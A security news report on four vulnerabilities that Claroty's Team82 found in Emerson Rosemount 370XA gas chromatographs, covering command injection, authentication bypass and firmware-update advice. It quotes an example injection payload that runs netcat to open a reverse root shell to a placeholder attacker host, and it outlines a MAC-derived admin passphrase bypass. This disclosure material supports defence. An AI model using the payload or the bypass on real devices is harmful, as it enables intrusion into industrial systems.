Multiple critical vulnerabilities have been identified in Emerson gas chromatographs, posing risks such as unauthorized access to sensitive data, denial-of-service conditions, and arbitrary command execution. Gas chromatographs are essential in various industries like chemical, environmental, and healthcare sectors for analyzing and separating chemical compounds. The Emerson Rosemount 370XA, a widely used model, uses a proprietary protocol for communication between the device and a technician's computer.
Security researchers from Claroty's Team82 discovered four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a critical CVSS v3 score of 9.8.
The vulnerability, designated CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command type. It involves a system function that uses a constructed shell command with a user-provided file name without proper sanitization, allowing attackers to inject arbitrary shell commands.
Attackers can exploit this vulnerability by supplying crafted inputs, such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
Another vulnerability, CVE-2023-51761, is an authentication bypass that allows attackers to reset the administrator password by calculating a secret passphrase derived from the device's MAC address. Since the MAC address is not secret and can be easily obtained, attackers can generate the passphrase and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.
The vulnerability CVE-2023-49716 involves a user login bypass through a password reset mechanism, enabling an unauthenticated user with network access to gain admin capabilities by bypassing authentication.
The final vulnerability, CVE-2023-43609, involves command injection via reboot functionality, allowing an authenticated user with network access to execute arbitrary commands remotely.
Due to the high cost and difficulty of obtaining a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They identified flaws in the device's protocol implementation, enabling them to craft payloads and uncover the vulnerabilities. For instance, the authentication bypass vulnerability allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.
Emerson has issued a security advisory recommending that end users update the firmware on their products. The Cybersecurity and Infrastructure Security Agency has also released an advisory regarding these vulnerabilities.